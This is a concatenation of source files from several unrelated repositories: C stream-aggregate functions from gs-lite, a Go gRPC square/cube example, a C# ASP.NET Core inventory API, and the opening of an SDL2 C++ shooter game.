void count_diff_lfta_l_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
if(scratch->count==0){
scratch->count = 1;
scratch->first.l = val;
}else{
if(scratch->last.l != val)
scratch->count++;
}
scratch->last.l = val;
}
void count_diff_lfta_l_LFTA_AGGR_OUTPUT_(struct gs_string* res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_l_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_l_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
// string
static gs_uint64_t local_hash_string(struct gs_string *x){
gs_uint32_t i;
gs_uint64_t ret=0,tmp_sum = 0;
for(i=0;i<x->length;++i){
tmp_sum |= (x->data[i]) << (8*(i%4));
if((i%4) == 3){
ret = tmp_sum + 12916008961267169387ull * ret;
tmp_sum = 0;
}
}
if((i%4)!=0) ret = tmp_sum + 12916008961267169387ull * ret;
return(ret);
}
void count_diff_lfta_s_LFTA_AGGR_INIT_(gs_sp_t s) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
scratch->count = 0;
scratch->first.ul = 0;
scratch->last.ul = 0;
}
void count_diff_lfta_s_LFTA_AGGR_UPDATE_(gs_sp_t s, struct gs_string* val) {
struct lfta_count_diff_scratch* scratch = (struct lfta_count_diff_scratch*)s;
gs_uint64_t hashval;
hashval = local_hash_string(val);
if(scratch->count==0){
scratch->count = 1;
scratch->first.ul = hashval;
}else{
if(scratch->last.ul != hashval)
scratch->count++;
}
scratch->last.ul = hashval;
}
void count_diff_lfta_s_LFTA_AGGR_OUTPUT_(struct gs_string* res, gs_sp_t scratch) {
res->data = (gs_sp_t)scratch;
res->length = sizeof(struct lfta_count_diff_scratch);
res->owner = NULL;
}
void count_diff_lfta_s_LFTA_AGGR_DESTROY_(gs_sp_t s) { }
gs_retval_t count_diff_lfta_s_LFTA_AGGR_FLUSHME_(gs_sp_t s) {
return 0;
}
/////////////////////////////////////////////////////////
// running_array_aggr aggregate
struct running_array_aggr_str{
gs_uint32_t num_list[4];
gs_uint8_t n_num;
};
void running_array_aggr_lfta_LFTA_AGGR_INIT_(char* scratch) {
struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
aggr->n_num = 0;
}
void running_array_aggr_lfta_LFTA_AGGR_UPDATE_(char* scratch, gs_uint32_t val) {
struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
aggr->num_list[aggr->n_num++] = val;
}
gs_retval_t running_array_aggr_lfta_LFTA_AGGR_FLUSHME_(char* scratch) {
struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
return (aggr->n_num == 4);
}
void running_array_aggr_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, char* scratch) {
struct running_array_aggr_str* aggr = (struct running_array_aggr_str*)scratch;
res->data = scratch;
res->length = aggr->n_num * sizeof(gs_uint32_t);
res->owner = NULL;
}
void running_array_aggr_lfta_LFTA_AGGR_DESTROY_(char* scratch) { }
/////////////////////////////////////////////////////////
// ==============================================================
// other rts functions.
// sum_int_in_list
// given e.g. '34|45|56' and sepchar '|', return 135.
// gracefully handle empty entries, e.g. '|8|' should return 8
gs_int64_t sum_uint_in_list(struct gs_string *list, struct gs_string *sepchar){
gs_int64_t ret = 0;
gs_int64_t val = 0;
gs_uint8_t sep;
gs_uint8_t v;
int c;
if(sepchar->length < 1)
return 0;
sep = sepchar->data[0];
for(c=0;c<list->length;++c){
v = list->data[c];
if(v==sep){
ret+=val;
val = 0;
}else{
val = 10*val + (v>='0' && v<='9')*(v-'0');
}
}
ret += val;
return ret;
}
// Convert an string to an integer
gs_int64_t to_llong(struct gs_string *v){
gs_int64_t ret=0;
gs_uint8_t d;
int c;
int neg=1;
if(v->length < 1)
return 0;
d = v->data[0];
if(d=='-'){
neg=-1;
}else{
ret = (d>='0' && d<='9')*(d-'0');
}
for(c=1;c<v->length;++c){
d = v->data[c];
ret = 10*ret+(d>='0' && d<='9')*(d-'0');
}
return neg*ret;
}
| dae5393db795e07ead94fe61fec689415e0dc857 | [
"reStructuredText",
"Markdown",
"Makefile",
"INI",
"Python",
"Text",
"C",
"C++",
"Shell"
] | 45 | Text | o-ran-sc/com-gs-lite | 2bc6bde491e4ae54fb54302c052f23a98482eb92 | 11eb73db423d4644ffb8d6f99b00bf1326ba02dc |
refs/heads/master | <file_sep>package main
import (
"fmt"
"log"
"net"
pb "github.com/n704/go_grpc_eg"
"golang.org/x/net/context"
"google.golang.org/grpc"
"google.golang.org/grpc/reflection"
)
const (
port = ":50051"
)
// server is used to implement helloworld.GreeterServer.
type server struct{}
func (s *server) CalculateSquare(ctx context.Context, in *pb.Int64) (*pb.Int64, error) {
newValue := in.Value * in.Value
fmt.Printf("Square of %d is %d\n", in.Value, newValue)
return &pb.Int64{Value: newValue}, nil
}
func (s *server) CalculateCube(ctx context.Context, in *pb.Int64) (*pb.Int64, error) {
newValue := in.Value * in.Value * in.Value
fmt.Printf("Cube of %d: %d\n", in.Value, newValue)
return &pb.Int64{Value: newValue}, nil
}
func main() {
lis, err := net.Listen("tcp", port)
if err != nil {
log.Fatalf("failed to listen: %v", err)
}
s := grpc.NewServer()
pb.RegisterGreeterServer(s, &server{})
// Register reflection service on gRPC server.
reflection.Register(s)
if err := s.Serve(lis); err != nil {
log.Fatalf("failed to serve: %v", err)
}
}
<file_sep># GO gRPC Example Square
This example is based on command line tool
# Installation
Installing all dependency files are managed by `dep` package manager
```shell
go get -u github.com/golang/dep/cmd/dep
dep ensure
```
# Working
Example I have written uses a server client communication using `tcp`
Client invoke server's service to get result.
In this example Server does 2 function
* Square
- Return square of number
- default number is 1
* Cube
- Return cube of number
- default number is 1
```shell
go run client/main.go -square 122 -cube 9
2018/04/26 15:10:54 Square of 122: 14884
2018/04/26 15:10:54 Cube of 9: 729
```
# Runing
For this to work we need to run first run `server` and `client`.
## Server
```shell
go run server/main.go
```
## Client
```shell
go run client/main.go
```
<file_sep>package main
import (
"flag"
"log"
"time"
pb "github.com/n704/go_grpc_eg"
"golang.org/x/net/context"
"google.golang.org/grpc"
)
const (
address = "localhost:50051"
defaultName = 1
)
func main() {
// Set up a connection to the server.
conn, err := grpc.Dial(address, grpc.WithInsecure())
if err != nil {
log.Fatalf("did not connect: %v", err)
}
defer conn.Close()
c := pb.NewGreeterClient(conn)
square := flag.Int64("square", 1, "find square of number")
cube := flag.Int64("cube", 1, "find cube of number")
flag.Parse()
// Contact the server and print out its response.
ctx, cancel := context.WithTimeout(context.Background(), time.Second)
defer cancel()
r, err := c.CalculateSquare(ctx, &pb.Int64{Value: *square})
if err != nil {
log.Fatalf("could not greet: %v", err)
}
log.Printf("Square of %d: %d\n", *square, r.Value)
r, err = c.CalculateCube(ctx, &pb.Int64{Value: *cube})
if err != nil {
log.Fatalf("could not greet: %v", err)
}
log.Printf("Cube of %d: %d\n", *cube, r.Value)
}
| e5217292d585bbf45df0f238d9ae533eb99b3509 | [
"Markdown",
"Go"
] | 3 | Go | n704/go_grpc_eg | ec34d1fe345cc01e0a7be3aac2c22b224524b6a6 | 60b3dd8a9548abd3e1972d84c648a91e187d625e |
refs/heads/master | <repo_name>chinglimchan/DragAndDrop<file_sep>/app/src/main/java/com/chenql/draganddrop/helper/OnStartDragListener.java
package com.chenql.draganddrop.helper;
import android.support.v7.widget.RecyclerView;
/**
* OnStartDragListener
*
* Created by chenqinglin777 on 7/4/2017.
*/
public interface OnStartDragListener {
void onStartDrag(RecyclerView.ViewHolder viewHolder);
}
| e3c439f724440177ff967f704b8baf7c4bfd3fad | [
"Java"
] | 1 | Java | chinglimchan/DragAndDrop | 1bf421d65a1cdf5b159a7cf63ba1e4b0c966c534 | 781616649c38cfe6ea9abf1f2de3cca795a469ff |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Text;
using Newtonsoft.Json;
namespace Common.Helpers.CustomMVCBinders
{
/// <inheritdoc />
/// <summary>
/// The purpose of this class is to TRIM all the JSON string inputs which come from body.
/// </summary>
public class JsonTrimStringConverter : JsonConverter
{
public override bool CanConvert(Type objectType)
{
return objectType == typeof(string);
}
public override bool CanRead => true;
public override bool CanWrite => false; // only used for reading inputs
public override object ReadJson(JsonReader reader, Type objectType, object existingValue, JsonSerializer serializer)
{
var text = (string)reader.Value;
return text?.Trim();
}
public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
{
throw new Exception("Not configured for writing");
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Reflection;
using System.Text;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
namespace Common.Helpers.CustomMVCBinders
{
/// <inheritdoc />
/// <summary>
/// Courtesy https://stackoverflow.com/questions/23830206/json-convert-empty-string-instead-of-null
/// </summary>
public sealed class SubstituteNullWithEmptyStringContractResolver : CamelCasePropertyNamesContractResolver
{
protected override JsonProperty CreateProperty(MemberInfo member, MemberSerialization memberSerialization)
{
var property = base.CreateProperty(member, memberSerialization);
if (property.PropertyType == typeof(string))
{
// Wrap value provider supplied by Json.NET.
property.ValueProvider = new NullToEmptyStringValueProvider(property.ValueProvider);
}
return property;
}
sealed class NullToEmptyStringValueProvider : IValueProvider
{
private readonly IValueProvider _provider;
public NullToEmptyStringValueProvider(IValueProvider provider)
{
_provider = provider ?? throw new ArgumentNullException(nameof(provider));
}
public object GetValue(object target)
{
return _provider.GetValue(target) ?? "";
}
public void SetValue(object target, object value)
{
_provider.SetValue(target, value);
}
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
namespace Api.Repositories
{
public interface IInventoriesRepository : IRepository<Inventory>
{
}
public class InventoriesRepository : BaseRepository<Inventory>, IInventoriesRepository
{
public InventoriesRepository(TernakLeleHmsContext context) : base(context)
{
}
}
}
<file_sep>using Common.Enums;
namespace Api.Models
{
public class Inventory
{
public Inventory() {}
public long InventoryId { get; set; }
public string CrossReference { get; set; }
public string Description { get; set; }
public DistributionUnit DistributionUnit { get; set; }
public InventoryType InventoryType { get; set; }
public string Name { get; set; }
public decimal Price { get; set; }
public double Quantity { get; set; }
public Rank Rank { get; set; }
public double ReorderPoint { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Text;
namespace Common.Dtos
{
public class InventoryDto
{
public long InventoryId { get; set; }
public string CrossReference { get; set; }
public string Description { get; set; }
public string DistributionUnit { get; set; }
public string InventoryType { get; set; }
public string Name { get; set; }
public decimal Price { get; set; }
public double Quantity { get; set; }
public string Rank { get; set; }
public double ReorderPoint { get; set; }
}
}
<file_sep>namespace Common.Enums
{
public enum DistributionUnit
{
Ampoule,
Bag,
Bottle
}
}
<file_sep>namespace Common.Enums
{
public enum InventoryType
{
Medication,
Supply
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
using AutoMapper;
using Common.Dtos;
namespace Api.AutoMapper
{
public class DomainProfile : Profile
{
public DomainProfile()
{
CreateMap<Inventory, InventoryDto>()
.ForMember(dto => dto.DistributionUnit, opt => opt.MapFrom(s => s.DistributionUnit.ToString()))
.ForMember(dto => dto.InventoryType, opt => opt.MapFrom(s => s.InventoryType.ToString()))
.ForMember(dto => dto.Rank, opt => opt.MapFrom(s => s.Rank.ToString()));
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
namespace Api.Repositories
{
public abstract class BaseRepository<TEntity> : IRepository<TEntity>
where TEntity : class
{
protected DbContext Db; // use the generic dbcontext to support multiple contexts base repo.
protected DbSet<TEntity> DbSet;
protected IQueryable<TEntity> InternalQuery;
public BaseRepository(DbContext context)
{
Db = context;
DbSet = Db.Set<TEntity>();
InternalQuery = DbSet;
}
public virtual void Add(TEntity obj)
{
DbSet.Add(obj);
}
public virtual void AddRange(IEnumerable<TEntity> objList)
{
DbSet.AddRange(objList);
}
public virtual TEntity GetById(object id)
{
return DbSet.Find(id);
}
public virtual IEnumerable<TEntity> GetAll()
{
return InternalQuery.ToList();
}
public DbSet<TEntity> All => DbSet;
public virtual void Remove(object id)
{
DbSet.Remove(DbSet.Find(id));
}
public void RemoveAll()
{
DbSet.RemoveRange(DbSet);
}
public void Remove(TEntity entity)
{
DbSet.Remove(entity);
}
public IEnumerable<TEntity> Find(Expression<Func<TEntity, bool>> predicate)
{
return InternalQuery.AsNoTracking().Where(predicate);
}
public virtual async Task<TEntity> FindAsync(object id)
{
return await DbSet.FindAsync(id);
}
public virtual async Task<TEntity> GetByIdAsync(object id)
{
return await DbSet.FindAsync(id);
}
public virtual async Task<IEnumerable<TEntity>> GetAllAsync()
{
return await InternalQuery.ToListAsync();
}
public async Task<int> SaveChangesAsync()
{
return await Db.SaveChangesAsync();
}
public void Include<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath)
{
InternalQuery = InternalQuery.Include(navigationPropertyPath);
}
public IRepository<TEntity> IncludeChain<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath)
{
Include(navigationPropertyPath);
return this;
}
public void UpdateOrAdd(TEntity updatedEntity, object entityId)
{
var entity = GetById(entityId);
if (entity != null)
{
var attachedEntry = Db.Entry(entity);
attachedEntry.CurrentValues.SetValues(updatedEntity);
}
else
{
DbSet.Add(updatedEntity);
}
}
public void Dispose()
{
Db.Dispose();
GC.SuppressFinalize(this);
}
}
}
<file_sep>using Microsoft.EntityFrameworkCore;
namespace Api.Models
{
public class TernakLeleHmsContext : DbContext
{
public TernakLeleHmsContext(DbContextOptions<TernakLeleHmsContext> options)
: base(options) { }
public TernakLeleHmsContext() : base() { }
public DbSet<Inventory> Inventories { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Text;
namespace Common.Enums
{
public enum Rank
{
A,
B,
C
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Globalization;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
using Api.Repositories;
using Api.Services;
using AutoMapper;
using Common.Helpers.CustomMVCBinders;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Http;
using Microsoft.AspNetCore.HttpsPolicy;
using Microsoft.AspNetCore.Localization;
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Mvc.Controllers;
using Microsoft.AspNetCore.Mvc.ViewComponents;
using Microsoft.EntityFrameworkCore;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Logging;
using Microsoft.Extensions.Options;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
using SimpleInjector;
using SimpleInjector.Lifestyles;
using SimpleInjector.Integration.AspNetCore.Mvc;
namespace Api
{
// todo setup AutoMapper, then create DTO and ViewModel to test it.
// todo register IRepository, IInventoriesService, IInventoriesRepository to SimpleInjector
// todo configure Logger then apply it to TernakLeleHMSContext
public class Startup
{
#region SimpleInjector
private readonly Container _container = new Container();
#endregion
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
// This method gets called by the runtime. Use this method to add services to the container.
public void ConfigureServices(IServiceCollection services)
{
services.Configure<RequestLocalizationOptions>(options =>
{
options.DefaultRequestCulture = new RequestCulture("en-GB");
options.SupportedCultures = new List<CultureInfo> { new CultureInfo("en-GB") };
options.RequestCultureProviders.Clear();
});
JsonConvert.DefaultSettings = () => new JsonSerializerSettings
{
ContractResolver = new SubstituteNullWithEmptyStringContractResolver()
};
// Register DbContext to DI
services.AddDbContext<TernakLeleHmsContext>(options => options.UseSqlServer(Configuration.GetConnectionString("TernakLeleHmsContext")));
#region AutoMapper
services.AddAutoMapper();
#endregion
services.AddMvc(options =>
{
options.Filters.Add(new ProducesAttribute("application/json"));
})
.SetCompatibilityVersion(CompatibilityVersion.Version_2_1)
.AddJsonOptions(options =>
{
options.SerializerSettings.ContractResolver = new CamelCasePropertyNamesContractResolver();
options.SerializerSettings.Converters.Insert(0, new JsonTrimStringConverter()); // global input trimming for JSON Body source
options.SerializerSettings.DateTimeZoneHandling = DateTimeZoneHandling.Utc;
});
#region SimpleInjector
IntegrateSimpleInjector(services);
#endregion
}
// This method gets called by the runtime. Use this method to configure the HTTP request pipeline.
// Configure is called after ConfigureServices is called.
public void Configure(IApplicationBuilder app, IHostingEnvironment env)
{
#region SimpleInjector
InitializeContainer(app);
#endregion
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
app.UseHsts();
}
app.UseHttpsRedirection();
#region SimpleInjector
_container.Verify();
#endregion
app.UseMvc();
}
#region SimpleInjector
private void IntegrateSimpleInjector(IServiceCollection services)
{
_container.Options.DefaultScopedLifestyle = new AsyncScopedLifestyle();
services.AddSingleton<IHttpContextAccessor, HttpContextAccessor>();
services.AddSingleton<IControllerActivator>(new SimpleInjectorControllerActivator(_container));
services.AddSingleton<IViewComponentActivator>(new SimpleInjectorViewComponentActivator(_container));
services.EnableSimpleInjectorCrossWiring(_container);
services.UseSimpleInjectorAspNetRequestScoping(_container);
}
private void InitializeContainer(IApplicationBuilder app)
{
// Add application presentation components:
_container.RegisterMvcControllers(app);
_container.RegisterMvcViewComponents(app);
// DbContext
var optionsBuilder = new DbContextOptionsBuilder<TernakLeleHmsContext>();
optionsBuilder.UseSqlServer(Configuration.GetConnectionString("TernakLeleHmsContext"));
_container.Register(() => new TernakLeleHmsContext(optionsBuilder.Options), Lifestyle.Scoped);
// Services
_container.Register<IInventoriesService, InventoriesService>(Lifestyle.Scoped);
// Repositories
_container.Register<IInventoriesRepository, InventoriesRepository>(Lifestyle.Scoped);
// Allow Simple Injector to resolve services from ASP.NET Core.
_container.AutoCrossWireAspNetComponents(app);
}
#endregion
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Data;
using System.Data.Common;
using System.Linq;
using System.Linq.Expressions;
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
namespace Api.Repositories
{
public interface IRepository<TEntity> : IDisposable where TEntity : class
{
void Add(TEntity obj);
void AddRange(IEnumerable<TEntity> objList);
/// <summary>
/// Updates an EXISTING entity to the updated entity OR add them to the context
/// </summary>
/// <param name="updatedEntity"></param>
/// <param name="entityId"></param>
void UpdateOrAdd(TEntity updatedEntity, object entityId);
/// <summary>
/// Fetch an entity with all of its navigation properties. Could be overridden to ensure more efficient fetching (obey the Include laws, if necessary).
/// </summary>
/// <param name="id"></param>
/// <returns></returns>
TEntity GetById(object id);
IEnumerable<TEntity> GetAll();
DbSet<TEntity> All { get; }
void Remove(object id);
void RemoveAll();
void Remove(TEntity entity);
IEnumerable<TEntity> Find(Expression<Func<TEntity, bool>> predicate);
/// <summary>
/// Finds an entity inside the context store or fetch from DB asynchronously.
/// Note that this WILL NOT obey the Include rules or fetch ANY Navigation props
/// </summary>
/// <param name="id"></param>
/// <returns></returns>
Task<TEntity> FindAsync(object id);
/// <summary>
/// Fetch an entity with all of its navigation properties asynchronously. Could be overridden to ensure more efficient fetching (obey the Include laws, if necessary).
/// </summary>
/// <param name="id"></param>
/// <returns></returns>
Task<TEntity> GetByIdAsync(object id);
Task<IEnumerable<TEntity>> GetAllAsync();
Task<int> SaveChangesAsync();
void Include<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath);
IRepository<TEntity> IncludeChain<TProperty>(Expression<Func<TEntity, TProperty>> navigationPropertyPath);
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Api.Models;
using Api.Repositories;
using Common.Dtos;
namespace Api.Services
{
public interface IInventoriesService
{
Task<IEnumerable<InventoryDto>> GetInventories();
}
public class InventoriesService : IInventoriesService
{
private readonly IInventoriesRepository _inventoriesRepo;
public InventoriesService(IInventoriesRepository inventoriesRepo)
{
_inventoriesRepo = inventoriesRepo;
}
public async Task<IEnumerable<InventoryDto>> GetInventories()
{
var dtos = new List<InventoryDto>()
{
new InventoryDto()
{
InventoryId = 1,
CrossReference = "Test",
DistributionUnit = "csdcsd",
Description = "fwefwe",
InventoryType = "csdcsd",
Name = "cdscsdc",
Price = new decimal(5.25),
Quantity = 2,
Rank = "C",
ReorderPoint = 3
},
new InventoryDto()
{
InventoryId = 2,
CrossReference = "vdfvd",
DistributionUnit = "vdfvdf",
Description = "bdbd",
InventoryType = "referf",
Name = "vdfvf",
Price = new decimal(7.34),
Quantity = 6,
Rank = "B",
ReorderPoint = 11
}
}.ToAsyncEnumerable();
return await dtos.ToList();
}
}
}
| ce2f9056dfef4d550023959147043ce6e7608892 | [
"C#"
] | 14 | C# | diazcempe/ternaklele-hms-api | dc7dc4466abea354deb1e7397f2f75568480be75 | 1dedfebf396839a5d8a7b5965d4b82504cbb84f4 |
refs/heads/master | <repo_name>gianlucabianco/reactnd-project-myreads-starter<file_sep>/src/components/BookCard.js
import React from 'react';
import PropTypes from 'prop-types';
import BookShelfChanger from './BookShelfChanger';
class BookCard extends React.Component {
onShelfChange = newShelf => {
this.props.onShelfChange(
{
newShelf,
book: {
id: this.props.book.id,
},
}
);
};
showDetails = book => {
this.props.showDetails( book );
};
render() {
const {
shelfName,
book,
} = this.props;
return (
<div className="book">
<div className="book-top">
<div
className="book-cover"
style={
{
width: 128,
height: 193,
backgroundRepeat: 'no-repeat',
backgroundPosition: 'center',
backgroundSize: 'cover',
backgroundImage: `url("${ book && book.imageLinks && book.imageLinks.thumbnail }")`,
}
}
onClick={ () => this.showDetails( book ) }
/>
<BookShelfChanger
shelfName={ shelfName }
onShelfChange={ this.onShelfChange }
/>
</div>
<div className="book-title" >
{
book
&& book.title
}
</div>
<div className="book-authors" >
{
book
&& book.authors
&& book.authors.map(
author => (
<div
key={ author }
>{ author }</div>
)
)
}
</div>
</div>
);
};
};
BookCard.propTypes = {
onShelfChange: PropTypes.func.isRequired,
showDetails: PropTypes.func.isRequired,
shelfName: PropTypes.string.isRequired,
book: PropTypes.object.isRequired,
};
export default BookCard;<file_sep>/src/components/BookShelfChanger.js
import React from 'react';
import PropTypes from 'prop-types';
class BookShelfChanger extends React.Component {
handleChange = event => {
const newShelf = event.target.value;
newShelf !== 'none'
&& this.props.onShelfChange(
newShelf
);
};
render() {
const { shelfName } = this.props;
return (
<div className="book-shelf-changer">
<select
onChange={ this.handleChange }
defaultValue={ shelfName }
>
<option value="move" disabled>Move to...</option>
<option value="currentlyReading">Currently Reading</option>
<option value="wantToRead">Want to Read</option>
<option value="read">Read</option>
<option value="none">None</option>
</select>
</div>
);
};
};
BookShelfChanger.propTypes = {
onShelfChange: PropTypes.func.isRequired,
shelfName: PropTypes.string.isRequired,
};
export default BookShelfChanger;<file_sep>/src/App.js
import React from 'react';
import { Route } from 'react-router-dom';
import * as BooksAPI from './BooksAPI';
import './App.css';
import ListBooks from './components/ListBooks';
import SearchBooks from './components/SearchBooks';
import DetailsModal from './components/DetailsModal';
class BooksApp extends React.Component {
state = {
bookShelves: [],
allBooks: [],
detailsModal: {
isOpen: false,
book: {},
}
};
componentDidMount = () => {
this.fetchBooks();
}
fetchBooks = () => {
BooksAPI.getAll()
.then(
books => {
this.setAllBooks( books )
}
);
}
setAllBooks = allBooks => {
this.setState(
{
allBooks
}
)
this.setShelves( allBooks );
}
setShelves = books => {
const bookShelves = [
{
title: 'Currently reading',
books: [],
},
{
title: 'Want to read',
books: [],
},
{
title: 'Read',
books: [],
},
];
books.forEach(
book => {
if ( book.shelf ) {
book.shelf === 'currentlyReading'
&& bookShelves[ 0 ].books.push( book );
book.shelf === 'wantToRead'
&& bookShelves[ 1 ].books.push( book );
book.shelf === 'read'
&& bookShelves[ 2 ].books.push( book );
}
}
);
this.setState(
{
bookShelves,
}
);
}
onShelfChange = newShelfData => {
BooksAPI.update(
{
id: newShelfData.book.id
},
newShelfData.newShelf
).then(
() => this.fetchBooks()
);
}
showDetails = book => {
this.setState(
{
detailsModal: {
isOpen: true,
book,
}
}
);
}
hideDetails = () => {
this.setState(
{
detailsModal: {
isOpen: false,
book: {},
}
}
);
}
render() {
const {
bookShelves,
allBooks,
detailsModal,
} = this.state;
return (
<div className="app">
<Route
path="/"
exact
render={
() => (
<ListBooks
bookShelves={ bookShelves }
onShelfChange={ this.onShelfChange }
showDetails={ this.showDetails }
/>
)
}
/>
<Route
path="/search"
exact
render={
() => (
<SearchBooks
allBooks={ allBooks }
onShelfChange={ this.onShelfChange }
showDetails={ this.showDetails }
/>
)
}
/>
{
detailsModal.isOpen
&& <DetailsModal
book={ detailsModal.book }
hideDetails={ this.hideDetails }
/>
}
</div>
)
}
}
export default BooksApp
<file_sep>/src/components/SearchBooks.js
import React from 'react';
import PropTypes from 'prop-types';
import { Link } from 'react-router-dom';
import { DebounceInput } from 'react-debounce-input';
import BookCard from './BookCard';
import ErrorMessage from './ErrorMessage';
import * as BooksAPI from '../BooksAPI';
class SearchBooks extends React.Component {
state = {
query: '',
results: [],
isError: false,
};
getShelfName = ( book, allBooks ) => {
let shelf = 'none';
const matchingBook = allBooks.find(
currentBook => currentBook.id === book.id
);
if( matchingBook )
shelf = matchingBook.shelf;
return shelf;
};
onShelfChange = newShelfData => {
this.props.onShelfChange( newShelfData );
};
showDetails = book => {
this.props.showDetails( book );
};
onSearch = query => {
this.setState(
{
query,
results: [],
isError: false,
}
);
query.length
&& BooksAPI.search(
query
).then(
result => {
Array.isArray( result )
? this.setState(
{
results: result,
isError: false,
}
)
: this.setState(
{
isError: true,
}
);
}
);
};
render() {
const { allBooks } = this.props;
const {
query,
results,
isError
} = this.state;
return (
<div className="search-books">
<div className="search-books-bar">
<Link
to="/"
className="close-search"
>
Close
</Link>
<div className="search-books-input-wrapper">
<DebounceInput
debounceTimeout={ 200 }
value={ query }
onChange={ event => this.onSearch( event.target.value ) }
type="text"
placeholder="Search by title or author"
/>
</div>
</div>
<div className="search-books-results">
<ol className="books-grid">
{
query
&& results
&& results.map(
book => (
<li
key={ book.id }
>
<BookCard
book={ book }
shelfName={ this.getShelfName( book, allBooks ) }
onShelfChange={ this.onShelfChange }
showDetails={ this.showDetails }
/>
</li>
)
)
}
</ol>
{
isError
&& <ErrorMessage
isError={ isError }
message={ 'No results founded. Please try with a different query' }
/>
}
</div>
</div>
);
};
};
SearchBooks.propTypes = {
onShelfChange: PropTypes.func.isRequired,
showDetails: PropTypes.func.isRequired,
allBooks: PropTypes.array.isRequired,
};
export default SearchBooks; | 2b471cbaa5a11dfe3ab1db14a4578b7cd3ea17a9 | [
"JavaScript"
] | 4 | JavaScript | gianlucabianco/reactnd-project-myreads-starter | d8e10fbcb4af7224fe8e1341446ea55b89d67730 | 54533a57c3afb84e166f17e819203d5652d8fa95 |
refs/heads/master | <repo_name>NegiXNodoka/final<file_sep>/HW_4.cpp
/*This source code copyrighted by <NAME> (2004-2014)
and may not be redistributed without written permission.*/
//Using SDL, SDL_image, standard IO, and strings
#include <SDL2/SDL.h>
#include <stdio.h>
#include <string>
#include <iostream>
#include <array>
#include "SDL2_gfxPrimitives.h"
#include <math.h>
//#include <SDL_image.h>
//Screen dimension constants
const int SCREEN_WIDTH = 600;
const int SCREEN_HEIGHT = 650;
int bossrad = 225;
const double PI = 3.1415926535897932384626433832795;
const int Bullet_RADIUS = 10;
int bulletCount = 0;
int bulletCount2 = 0;
int alienCount = 0;
SDL_Renderer* renderer = nullptr;
//Texture wrapper class
class LTexture
{
public:
//Initializes variables
LTexture();
//Deallocates memory
~LTexture();
//Loads image at specified path
bool loadFromFile( std::string path );
#ifdef _SDL_TTF_H
//Creates image from font string
bool loadFromRenderedText( std::string textureText, SDL_Color textColor );
#endif
//Deallocates texture
void free();
//Set color modulation
void setColor( Uint8 red, Uint8 green, Uint8 blue );
//Set blending
void setBlendMode( SDL_BlendMode blending );
//Set alpha modulation
void setAlpha( Uint8 alpha );
//Renders texture at given point
void render( int x, int y, SDL_Rect* clip = NULL, double angle = 0.0, SDL_Point* center = NULL, SDL_RendererFlip flip = SDL_FLIP_NONE );
//Gets image dimensions
int getWidth();
int getHeight();
private:
//The actual hardware texture
SDL_Texture* mTexture;
//Image dimensions
int mWidth;
int mHeight;
};
//The Bullet that will move around on the screen
class Bullet;
//The FIGHTER that will move around on the screen
class FIGHTER
{
public:
//The dimensions of the FIGHTER
static const int FIGHTER_WIDTH = 50;
static const int FIGHTER_HEIGHT = 50;
//Maximum axis velocity of the FIGHTER
static const int FIGHTER_VEL = 3;
int hp = 10;
//Initializes the variables
FIGHTER();
//Takes key presses and adjusts the FIGHTER's velocity
void handleEvent( SDL_Event& e );
//Moves the FIGHTER and checks collision
void move();
//Shows the FIGHTER on the screen
void render();
int yPos();
int xPos();
int gotHit();
int getHp();
private:
//The X and Y offsets of the FIGHTER
int mPosX, mPosY;
//The velocity of the FIGHTER
int mVelX, mVelY;
//FIGHTER's collision box
SDL_Rect mCollider;
long shootTimer;
long lastHit;
};
class Bullet
{
public:
//The X and Y offsets of the FIGHTER
int mPosX, mPosY;
//Initializes the variables
Bullet(int x, int y, int speed, float angle, bool rotate, bool east);
//Moves the Bullet and checks collision
void move();
//Shows the FIGHTER on the screen
void render();
int xPos();
int yPos();
private:
bool changeDir;
int ms;
float dir;
long changePat;
//FIGHTER's collision box
int changed = 0;
bool rot;
};
class ALIEN
{
public:
//The dimensions of the FIGHTER
static const int ALIEN_WIDTH = 50;
static const int ALIEN_HEIGHT = 50;
//Maximum axis velocity of the FIGHTER
static const int ALIEN_VEL = 2;
//Initializes the variables
ALIEN(int x, int y, int type);
//Moves the FIGHTER and checks collision
void move(int xPos, int yPos);
//Shows the FIGHTER on the screen
